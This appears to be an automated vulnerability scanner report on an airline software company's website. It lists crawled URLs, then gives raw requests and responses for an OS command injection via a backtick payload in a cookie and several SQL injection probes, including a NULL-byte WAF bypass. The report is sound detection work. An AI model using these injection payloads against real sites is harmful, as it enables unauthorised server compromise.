13.48. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning

13.49. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/

13.50. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence

13.51. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence/

13.52. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology

13.53. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology/

13.54. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand

13.55. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand/

13.56. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit

13.57. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit/

13.58. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads

13.59. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/

13.60. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images

13.61. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/

13.62. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/pdf_icon.gif

13.63. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images/

13.64. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images/pdf_icon.gif

13.65. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list

13.66. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network

13.67. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/

13.68. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_revenue

13.69. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/airport

13.70. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/

13.71. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/

13.72. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/images/

13.73. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images/pdf_icon.gif

13.74. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/manage_change/

13.75. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_crew/

13.76. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_flight/

13.77. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_maintenance/

13.78. http://www.sabreairlinesolutions.com/home/products_services/product/corporate_management

13.79. http://www.sabreairlinesolutions.com/home/products_services/product/developer_tool

13.80. http://www.sabreairlinesolutions.com/home/products_services/product/electronic_ticketing_for_third-party_ground_handling

13.81. http://www.sabreairlinesolutions.com/home/products_services/product/frequent_flyer_management

13.82. http://www.sabreairlinesolutions.com/home/products_services/product/gds_electronic_ticketing

13.83. http://www.sabreairlinesolutions.com/home/products_services/product/interact_interface

13.84. http://www.sabreairlinesolutions.com/home/products_services/product/interline_electronic_ticketing_hub

13.85. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager

13.86. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_manager

13.87. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_planner

13.88. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager

13.89. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control

13.90. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager

13.91. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager

13.92. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_roster_maker

13.93. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_admin

13.94. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_manager

13.95. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_planner

13.96. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airport_data_intelligence

13.97. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_cargo_revenue_manager

13.98. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_codeshare_manager

13.99. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fares_manager

13.100. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager

13.101. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_ecommerce

13.102. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_manager

13.103. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight

13.104. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager

13.105. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_essentials

13.106. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_manager

13.107. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_accounting

13.108. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_manager

13.109. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_schedule_manager

13.110. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_slot_manager_iata

13.111. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_emd_manager

13.112. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_gds_display_analysis

13.113. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_qik_analysis_system

13.114. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager

13.115. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_check-in

13.116. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_inventory

13.117. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_sell

13.118. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_web

13.119. http://www.sabreairlinesolutions.com/home/products_services/product/web_services

13.120. http://www.sabreairlinesolutions.com/home/products_services/product_index/

13.121. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fares_manager

13.122. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_network_manager

13.123. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_profit_essentials

13.124. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_profit_manager

13.125. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_schedule_manager

13.126. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_slot_manager_iata

13.127. http://www.sabreairlinesolutions.com/home/products_services/sabre_reaccommodation_manager



1. OS command injection  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/sabresonic_res

Issue detail

The exp_tracker cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the exp_tracker cookie. The application took 36047 milliseconds to respond to the request, compared with 359 milliseconds for the original request, indicating that the injected command caused a time delay.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:

Request

GET /home/products_services/airline_reservations/sabresonic_res HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323028; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fairline_reservations%2Fnews%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_check-in%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3B%7D`ping%20-c%2020%20127.0.0.1`;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:01:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323028; expires=Thu, 06-Oct-2011 06:01:44 GMT; path=/
Set-Cookie: exp_last_activity=1286362904; expires=Thu, 06-Oct-2011 06:01:44 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:02:18 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2. SQL injection  previous  next
There are 29 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://www.sabreairlinesolutions.com/home/about/executive_team/greg_gilchrist [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/executive_team/greg_gilchrist

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/about/executive_team/greg_gilchrist?1%00'=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321270; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:26:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/about/executive_team/greg_gilchrist?1%00''=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321270; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:27:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321270; expires=Thu, 06-Oct-2011 01:27:05 GMT; path=/
Set-Cookie: exp_last_activity=1286346424; expires=Thu, 06-Oct-2011 01:27:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:27:14 GMT
Pragma: no-cache
Content-Length: 7888
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.2. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/the_as_advantage/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home'/about/the_as_advantage/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:22:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home''/about/the_as_advantage/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 06 Oct 2010 01:22:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide
...[SNIP]...

2.3. http://www.sabreairlinesolutions.com/home/business_issues [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/business_issues HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:20:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/business_issues HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:20:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286320657%27%27; expires=Thu, 06-Oct-2011 01:21:13 GMT; path=/
Set-Cookie: exp_last_activity=1286346070; expires=Thu, 06-Oct-2011 01:21:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fbusiness_issues%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:21:22 GMT
Pragma: no-cache
Content-Length: 7068
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.4. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list/ [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/commercial_planning/my_list/

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/commercial_planning/my_list/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322977'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:01:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/commercial_planning/my_list/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322977''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322977%27%27; expires=Thu, 06-Oct-2011 04:01:10 GMT; path=/
Set-Cookie: exp_last_activity=1286355668; expires=Thu, 06-Oct-2011 04:01:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 04:02:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.5. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations [exp_tracker cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations

Issue detail

The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/enterprise_operations HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/complete_the_picture/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321275; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D';

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:19:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/enterprise_operations HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/complete_the_picture/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321275; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D'';

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
